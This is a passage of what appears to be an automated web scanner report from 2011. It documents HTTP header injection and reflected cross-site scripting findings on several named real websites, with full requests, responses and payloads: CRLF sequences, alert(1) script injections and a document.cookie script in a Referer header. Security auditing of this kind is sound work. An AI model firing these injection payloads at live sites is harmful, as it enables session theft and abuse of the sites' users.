Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload 8adf5%0d%0ab18ee1d46fb was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=DWT&si=18139&pi=L&xs=1&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dind%25253Aind_bizser&v=5.5&cb=72895 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=ind:ind_bizser
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1298638034; Tsid=0^1298033234^1298035034|18139^1298033234^1298035034; TData=99999|^|#|53615; Anxd=x; N=2:4bb61a8cd423e3c48ff8843b87a5babd8adf5%0d%0ab18ee1d46fb; ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:51:11 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 18 Feb 2011 13:06:11 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Mon, 13-Feb-12 12:51:11 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1298638271; path=/; expires=Fri, 25-Feb-11 12:51:11 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298033234^1298035271|18139^1298033234^1298035271; path=/; expires=Fri, 18-Feb-11 13:21:11 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|#|53615; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Fri, 18-Feb-11 18:51:11 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:4bb61a8cd423e3c48ff8843b87a5babd8adf5
b18ee1d46fb
,4bb61a8cd423e3c48ff8843b87a5babd; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=; expires=Mon, 13-Feb-12 12:51:11 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 110
Content-Type: application/x-javascript
Content-Length: 110

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|#|53615';
ANRTXR();


2.30. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload 15802%0d%0a6fe09aee5f0 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=DWT&si=15802%0d%0a6fe09aee5f0&pi=L&xs=3&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dind%25253Aind_bizser&v=5.5&cb=4708&tid= HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=ind:ind_bizser
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 18 Feb 2011 12:47:47 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Fri, 18 Feb 2011 13:02:47 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FqajBjYzJqbWc=; path=/; expires=Mon, 13-Feb-12 12:47:47 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1298638067; path=/; expires=Fri, 25-Feb-11 12:47:47 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298033267^1298035067|15802
6fe09aee5f0
^1298033267^1298035067; path=/; expires=Fri, 18-Feb-11 13:17:47 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|#|53615; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Fri, 18-Feb-11 18:47:47 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:4bb61a8cd423e3c48ff8843b87a5babd; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU=; expires=Mon, 13-Feb-12 12:47:47 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 110
Content-Type: application/x-javascript
Content-Length: 110

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqjj0cc2jmg';
var ANSL='99999|^|#|53615';
ANRTXR();


2.31. http://www.thelist.com/pppclicks.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /pppclicks.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload f509c%0d%0a6dde35ca4e3 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pppclicks.php?type=PROFILE&cid=2901&target=/HTML/5/2349355./f509c%0d%0a6dde35ca4e3html HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:49:45 GMT
Server: Apache
Location: /HTML/5/2349355./f509c
6dde35ca4e3
html
Content-Type: text/html
Content-Length: 0


2.32. http://www.thelist.com/pppclicks.php [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /pppclicks.php

Issue detail

The value of the target request parameter is copied into the Location response header. The payload d7130%0d%0acc710b14b5f was submitted in the target parameter. This caused a response containing an injected HTTP header.

Request

GET /pppclicks.php?type=PROFILE&cid=2901&target=d7130%0d%0acc710b14b5f HTTP/1.1
Host: www.thelist.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QUADIDX=107; qsg=14508; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026063098:ss=1298026063098; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; __utmc=219744476; __utmb=219744476.2.10.1298033251; _bizo_cksm_crc32=B0104A9B; _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; _bizo_cksm=1260A44F5CFBD6E0; _bizo_np_stats=107%3D64%2C217%3D123%2C224%3D2442%2C155%3D6270%2C

Response

HTTP/1.1 302 Found
Date: Fri, 18 Feb 2011 12:48:05 GMT
Server: Apache
Location: d7130
cc710b14b5f

Content-Type: text/html
Content-Length: 0


3. Cross-site scripting (reflected)  previous
There are 143 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://aserve.directorym.com/ModuleG.aspx [dm_affiliate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aserve.directorym.com
Path:   /ModuleG.aspx

Issue detail

The value of the dm_affiliate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5948'%3balert(1)//81e894ba1c7 was submitted in the dm_affiliate parameter. This input was echoed as e5948';alert(1)//81e894ba1c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ModuleG.aspx?dm_affiliate=448e5948'%3balert(1)//81e894ba1c7&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url= HTTP/1.1
Host: aserve.directorym.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Fri, 18 Feb 2011 15:22:09 GMT
Connection: close
Content-Length: 70772


<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<script type="text/javascript">
var Url = 'http://www.directorym.net/s.aspx?s=affiliate448e5948';alert(1)//81e894ba1c7&a=448e5948';alert(1)//81e894ba1c7'
var CId = 0;
var RId = '';
var CIdDefault = 0;
var RIdDefault = '';
var CL = new Array();
var RL = new Array();
RL[0] = new Option
...[SNIP]...

3.2. http://aserve.directorym.com/ModuleG.aspx [dm_link_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aserve.directorym.com
Path:   /ModuleG.aspx

Issue detail

The value of the dm_link_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49631'-alert(1)-'9e2f0599833 was submitted in the dm_link_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ModuleG.aspx?dm_affiliate=448&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url=49631'-alert(1)-'9e2f0599833 HTTP/1.1
Host: aserve.directorym.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Fri, 18 Feb 2011 15:22:15 GMT
Connection: close
Content-Length: 70741


<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<script type="text/javascript">
var Url = 'http://49631'-alert(1)-'9e2f0599833.directorym.net/s.aspx?s=affiliate448&a=448'
var CId = 0;
var RId = '';
var CIdDefault = 0;
var RIdDefault = '';
var CL = new Array();
var RL = new Array();
RL[0] = n
...[SNIP]...

3.3. http://aserve.directorym.com/ModuleG.aspx [dm_set_regionlist parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aserve.directorym.com
Path:   /ModuleG.aspx

Issue detail

The value of the dm_set_regionlist request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5fad'%3balert(1)//9e3059aac77 was submitted in the dm_set_regionlist parameter. This input was echoed as f5fad';alert(1)//9e3059aac77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ModuleG.aspx?dm_affiliate=448&dm_size=336x280&dm_color_border=66CC99&dm_color_title=000000&dm_color_links=000000&dm_color_background=FFFFFF&dm_set_categorylist=&dm_set_categoryexcludelist=&dm_set_autoregion=no&dm_set_regionlist=f5fad'%3balert(1)//9e3059aac77&dm_set_regionexcludelist=&dm_set_topic=technology&dm_open_in_new_window=&dm_link_url= HTTP/1.1
Host: aserve.directorym.com
Proxy-Connection: keep-alive
Referer: http://www.pdastreet.com/?79bf7--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E338075590f4=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa TAIa PSAa PSDa CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Fri, 18 Feb 2011 15:22:12 GMT
Connection: close
Content-Length: 5690


<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<script type="text/javascript">
var Url = 'http://www.directorym.net/s.aspx?s=affiliate448&a=448'
var CId = 0;
var RId = 'f5fad';alert(1)//9e3059aac77';
var CIdDefault = 0;
var RIdDefault = 'f5fad';alert(1)//9e3059aac77';
var CL = new Array();
var RL = new Array();
RL[0] = new Option("NY - Liverpool", "LER");
RL[1] = new Op
...[SNIP]...

3.4. http://flash.quantserve.com/quant.swf [lc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://flash.quantserve.com
Path:   /quant.swf

Issue detail

The value of the lc request parameter is copied into the HTML document as plain text between tags. The payload 915d3<a%20b%3dc>bf11e275031 was submitted in the lc parameter. This input was echoed as 915d3<a b=c>bf11e275031 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /quant.swf?fpf=1%2D0%2D0&videoId=document%5Fembed%5Fplayer&server=http%3A%2F%2Fflash%2Equantserve%2Ecom&doc=casestudynyplv08%2D110208115856%2Dphpapp02&publisherId=p%2DabU44ONrAuwk2&lc=%5F1298044537842%5F9208915d3<a%20b%3dc>bf11e275031&stripped%5Ftitle=hootsuite%2Din%2Dthe%2Dlibrary&qcv=2%2E1%2E1&pageURL=http%3A%2F%2Fblog%2Ehootsuite%2Ecom%2F&userName=hootsuite&flashPlayer=WIN%2010%2C2%2C154%2C12&url=http%3A%2F%2Fstatic%2Eslidesharecdn%2Ecom%2Fswf%2Fdoc%5Fplayer%2Eswf%3Fdoc%3Dcasestudynyplv08%2D110208115856%2Dphpapp02%26stripped%5Ftitle%3Dhootsuite%2Din%2Dthe%2Dlibrary%26userName%3Dhootsuite&media=widget HTTP/1.1
Host: flash.quantserve.com
Proxy-Connection: keep-alive
Referer: http://static.slidesharecdn.com/swf/doc_player.swf?doc=casestudynyplv08-110208115856-phpapp02&stripped_title=hootsuite-in-the-library&userName=hootsuite
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d5af335-78cce-d894f-1b47b; d=EJkBBgGJBg

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: application/x-shockwave-flash
Cache-Control: private, no-transform, max-age=86400
Expires: Sat, 19 Feb 2011 15:56:44 GMT
Date: Fri, 18 Feb 2011 15:56:44 GMT
Server: QS
Content-Length: 4698

FWS.Z...x.._.........D.....C....?.0....X.n.setTrace.dothetrace.allowTrace.read_so._depth.setUpLocal_lc.remote_lc.LocalConnection.LOCAL_LCNAME.rpcResult.REMOTE_LCNAME.send.local_lc.allowDomain.allowIns
...[SNIP]...
ject not saved..quant Shared object flushed to disk..quant Shared object could not be flushed to disk..write_so.idToSecs.-.indexOf.slice.parseInt.Math.floor.Date.getTime..join.1-0-0._1298044537842_9208915d3<a b=c>bf11e275031.nothetrace.3.0.0.this.logs.initialize....initialize....)..............I............................=..    ..........O..............=................@...................    .
.................R....setUpLoc
...[SNIP]...

3.5. http://forms.vendorseek.com/controller [&CCID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the &CCID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7bc4"><script>alert(1)</script>a0ea45578b5 was submitted in the &CCID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4"><script>alert(1)</script>a0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:17 GMT
Connection: close
Set-Cookie: JSESSIONID=89625029A4CD9FF9F81EE602CF235862.app6-all2; Path=/
Set-Cookie: JSESSIONID=891E10200271FCF9A35D2D8BB89D5BD4.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:17 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033297081; Expires=Sat, 16-Feb-2019 12:48:17 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
SiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910c7bc4"><script>alert(1)</script>a0ea45578b5&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56
...[SNIP]...

3.6. http://forms.vendorseek.com/controller [&exp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forms.vendorseek.com
Path:   /controller

Issue detail

The value of the &exp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c41be"><script>alert(1)</script>31799f5b297 was submitted in the &exp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /controller?srvid=67110&ft=default&tnum=1&ctnum=1&css=http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=yc41be"><script>alert(1)</script>31799f5b297&&exp=y&InternalReferralURL=&hidepriv=true&&CCID=20114257203585399&QTR=ZZf201004061902210Za20114257Zg172Zw56Zm0Zc203585399Zs6598ZZ&CLK=256110218044720381&&exp=y HTTP/1.1
Host: forms.vendorseek.com
Proxy-Connection: keep-alive
Referer: http://www.vendorseek.com/website_design_and_ecommerce.asp?&CCID=20099791203555503&QTR=ZZf201001141843480Za20099791Zg172Zw56Zm0Zc203555503Zs8986ZZ&CLK=166110218044716818&&CCID=20123519203630910&QTR=ZZf0Za20123519Zb0Zg172Zw56Zm0Zc203630910,203630910Zs9544ZZ&CLK=394110218044719808&&exp=y&&exp=y
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By:
P3P: CP='IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT'
Cache-Control: public
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Feb 2011 12:48:20 GMT
Connection: close
Set-Cookie: JSESSIONID=38B899E6AE6CF116484B12AB1EF27BA0.app6-all2; Path=/
Set-Cookie: JSESSIONID=C0DD9B714801E591C905AAF4F207287E.app6-all2; Path=/
Set-Cookie: CCID=20099791203555503; Expires=Sat, 16-Feb-2019 12:48:20 GMT; Path=/
Set-Cookie: CLK=166110218044716818#1298033300854; Expires=Sat, 16-Feb-2019 12:48:20 GMT; Path=/
Content-Length: 3814

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Website Design/E-Commerce Solutions</title><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta nam
...[SNIP]...
